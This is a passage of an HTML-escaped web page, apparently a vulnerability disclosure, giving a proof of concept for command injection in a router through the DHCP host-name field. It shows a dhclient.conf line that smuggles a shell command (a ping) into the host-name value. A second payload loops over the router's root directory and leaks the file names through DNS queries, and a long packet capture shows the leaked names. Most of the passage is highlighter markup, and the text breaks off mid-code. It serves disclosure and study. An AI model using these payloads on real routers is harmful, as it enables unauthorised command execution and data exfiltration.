<\/p>\n<p><strong>Proof of Concept<\/strong><br \/> To exploit this vulnerability, we need to be on the same LAN as the victim and to set up a DHCP server under our control.<\/p>\n<p>In this Proof of Concept we will use a Kali machine.<\/p>\n<p>The attacker needs to edit the <em>\/etc\/dhcp\/dhclient.conf<\/em> file and change the <em>host-name<\/em> field to the command we want to execute.<\/p>\n<p>The following DHCP request will execute the ping command on the router:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-598a38e8ac966241161931\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div 
class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> send host-name = &#8220;;ping 192.168.0.100&#8221;;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac966241161931-1\">1<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac966241161931-1\"><span class=\"crayon-e\">send <\/span><span class=\"crayon-v\">host<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">name<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;;ping 192.168.0.100&#8221;<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0003 seconds] -->  <\/p>\n<p>In order to see the results you need to sniff the network and inspect the packets<\/p>\n<p>Using DNS to exfiltrate information:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-598a38e8ac969009217806\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 
15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> send host-name = &#8220;;for i in `ls \/`; do ping $i;done&#8221;;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac969009217806-1\">1<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div 
class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac969009217806-1\"><span class=\"crayon-e\">send <\/span><span class=\"crayon-v\">host<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">name<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;;for i in `ls \/`; do ping $i;done&#8221;<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0002 seconds] -->  <\/p>\n<p>If we will sniff the network we will see the following:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-598a38e8ac96b002262104\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div 
class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> 17:41:42.963917 IP 192.168.1.1 &gt; 192.168.1.100: ICMP 192.168.1.1 udp port 53 unreachable, length 36  17:41:44.955685 IP 192.168.1.100.37895 &gt; 192.168.1.1.53: 2+ AAAA? www. (21)  17:41:44.955754 IP 192.168.1.1 &gt; 192.168.1.100: ICMP 192.168.1.1 udp port 53 unreachable, length 36  17:41:44.956251 IP 192.168.1.100.51733 &gt; 192.168.1.1.53: 3+ AAAA? www. (21)  17:41:44.956282 IP 192.168.1.1 &gt; 192.168.1.100: ICMP 192.168.1.1 udp port 53 unreachable, length 36  17:41:44.956797 IP 192.168.1.100.52958 &gt; 192.168.1.1.53: 4+ AAAA? www. (21)  17:41:44.956821 IP 192.168.1.1 &gt; 192.168.1.100: ICMP 192.168.1.1 udp port 53 unreachable, length 36  17:41:44.957639 IP 192.168.1.100.49007 &gt; 192.168.1.1.53: 5+ A? www. (21)  17:41:44.957660 IP 192.168.1.1 &gt; 192.168.1.100: ICMP 192.168.1.1 udp port 53 unreachable, length 36  17:41:44.958327 IP 192.168.1.100.42641 &gt; 192.168.1.1.53: 6+ A? www. (21)  17:41:44.958351 IP 192.168.1.1 &gt; 192.168.1.100: ICMP 192.168.1.1 udp port 53 unreachable, length 36  17:41:44.958837 IP 192.168.1.100.36077 &gt; 192.168.1.1.53: 7+ A? www. (21)  17:41:44.958857 IP 192.168.1.1 &gt; 192.168.1.100: ICMP 192.168.1.1 udp port 53 unreachable, length 36  17:41:44.965678 IP 192.168.1.100.49884 &gt; 192.168.1.1.53: 2+ AAAA? var. 
(21)  17:41:44.965704 IP 192.168.1.1 &gt; 192.168.1.100: ICMP 192.168.1.1 udp port 53 unreachable, length 36  17:41:44.969792 IP 192.168.1.100.53144 &gt; 192.168.1.1.53: 3+ AAAA? var. (21)  17:41:44.969820 IP 192.168.1.1 &gt; 192.168.1.100: ICMP 192.168.1.1 udp port 53 unreachable, length 36  17:41:44.970305 IP 192.168.1.100.32949 &gt; 192.168.1.1.53: 4+ AAAA? var. (21)  17:41:44.970326 IP 192.168.1.1 &gt; 192.168.1.100: ICMP 192.168.1.1 udp port 53 unreachable, length 36  17:41:44.970971 IP 192.168.1.100.48094 &gt; 192.168.1.1.53: 5+ A? var. (21)  17:41:44.970993 IP 192.168.1.1 &gt; 192.168.1.100: ICMP 192.168.1.1 udp port 53 unreachable, length 36  17:41:44.971505 IP 192.168.1.100.52246 &gt; 192.168.1.1.53: 6+ A? var. (21)  17:41:44.971516 IP 192.168.1.1 &gt; 192.168.1.100: ICMP 192.168.1.1 udp port 53 unreachable, length 36  17:41:44.972015 IP 192.168.1.100.41323 &gt; 192.168.1.1.53: 7+ A? var. (21)  17:41:44.972036 IP 192.168.1.1 &gt; 192.168.1.100: ICMP 192.168.1.1 udp port 53 unreachable, length 36  17:41:44.974624 IP 192.168.1.100.50795 &gt; 192.168.1.1.53: 2+ AAAA? usr. (21)  17:41:44.974653 IP 192.168.1.1 &gt; 192.168.1.100: ICMP 192.168.1.1 udp port 53 unreachable, length 36  17:41:44.975316 IP 192.168.1.100.38359 &gt; 192.168.1.1.53: 3+ AAAA? usr. (21)  17:41:44.975337 IP 192.168.1.1 &gt; 192.168.1.100: ICMP 192.168.1.1 udp port 53 unreachable, length 36  17:41:44.975827 IP 192.168.1.100.55240 &gt; 192.168.1.1.53: 4+ AAAA? usr. (21)  17:41:44.975848 IP 192.168.1.1 &gt; 192.168.1.100: ICMP 192.168.1.1 udp port 53 unreachable, length 36  17:41:44.976660 IP 192.168.1.100.44499 &gt; 192.168.1.1.53: 5+ A? usr. (21)  17:41:44.976668 IP 192.168.1.1 &gt; 192.168.1.100: ICMP 192.168.1.1 udp port 53 unreachable, length 36  17:41:44.979721 IP 192.168.1.100.57446 &gt; 192.168.1.1.53: 6+ A? usr. 
(21)  17:41:44.979748 IP 192.168.1.1 &gt; 192.168.1.100: ICMP 192.168.1.1 udp port 53 unreachable, length 36  17:41:44.980401 IP 192.168.1.100.35172 &gt; 192.168.1.1.53: 7+ A? usr. (21)  17:41:44.980422 IP 192.168.1.1 &gt; 192.168.1.100: ICMP 192.168.1.1 udp port 53 unreachable, length 36  17:41:44.983041 IP 192.168.1.100.60090 &gt; 192.168.1.1.53: 2+ AAAA? tmp. (21)<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac96b002262104-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac96b002262104-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac96b002262104-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac96b002262104-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac96b002262104-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac96b002262104-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac96b002262104-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac96b002262104-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac96b002262104-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac96b002262104-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac96b002262104-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac96b002262104-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac96b002262104-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac96b002262104-14\">14<\/div>\n<div class=\"crayon-num\" 
data-line=\"crayon-598a38e8ac96b002262104-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac96b002262104-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac96b002262104-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac96b002262104-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac96b002262104-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac96b002262104-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac96b002262104-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac96b002262104-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac96b002262104-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac96b002262104-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac96b002262104-25\">25<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac96b002262104-26\">26<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac96b002262104-27\">27<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac96b002262104-28\">28<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac96b002262104-29\">29<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac96b002262104-30\">30<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac96b002262104-31\">31<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac96b002262104-32\">32<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac96b002262104-33\">33<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac96b002262104-34\">34<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac96b002262104-35\">35<\/div>\n<div class=\"crayon-num crayon-striped-num\" 
data-line=\"crayon-598a38e8ac96b002262104-36\">36<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac96b002262104-37\">37<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac96b002262104-38\">38<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac96b002262104-1\"><span class=\"crayon-cn\">17<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">41<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">42.963917<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">IP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.100<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">ICMP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">udp <\/span><span class=\"crayon-i\">port<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">53<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">unreachable<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">length<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">36<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac96b002262104-2\"><span class=\"crayon-cn\">17<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">41<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">44.955685<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">IP<\/span><span class=\"crayon-h\"> 
<\/span><span class=\"crayon-cn\">192.168.1.100.37895<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1.53<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">AAAA<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">www<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">21<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac96b002262104-3\"><span class=\"crayon-cn\">17<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">41<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">44.955754<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">IP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.100<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">ICMP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">udp <\/span><span class=\"crayon-i\">port<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">53<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">unreachable<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">length<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">36<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac96b002262104-4\"><span 
class=\"crayon-cn\">17<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">41<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">44.956251<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">IP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.100.51733<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1.53<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">AAAA<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">www<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">21<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac96b002262104-5\"><span class=\"crayon-cn\">17<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">41<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">44.956282<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">IP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.100<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">ICMP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">udp <\/span><span class=\"crayon-i\">port<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">53<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">unreachable<\/span><span 
class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">length<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">36<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac96b002262104-6\"><span class=\"crayon-cn\">17<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">41<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">44.956797<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">IP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.100.52958<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1.53<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">AAAA<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">www<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">21<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac96b002262104-7\"><span class=\"crayon-cn\">17<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">41<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">44.956821<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">IP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.100<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">ICMP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1<\/span><span 
class=\"crayon-h\"> <\/span><span class=\"crayon-e\">udp <\/span><span class=\"crayon-i\">port<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">53<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">unreachable<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">length<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">36<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac96b002262104-8\"><span class=\"crayon-cn\">17<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">41<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">44.957639<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">IP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.100.49007<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1.53<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">5<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">A<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">www<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">21<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac96b002262104-9\"><span class=\"crayon-cn\">17<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">41<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">44.957660<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">IP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;<\/span><span 
class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.100<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">ICMP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">udp <\/span><span class=\"crayon-i\">port<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">53<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">unreachable<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">length<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">36<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac96b002262104-10\"><span class=\"crayon-cn\">17<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">41<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">44.958327<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">IP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.100.42641<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1.53<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">6<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">A<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">www<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">21<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac96b002262104-11\"><span class=\"crayon-cn\">17<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">41<\/span><span class=\"crayon-o\">:<\/span><span 
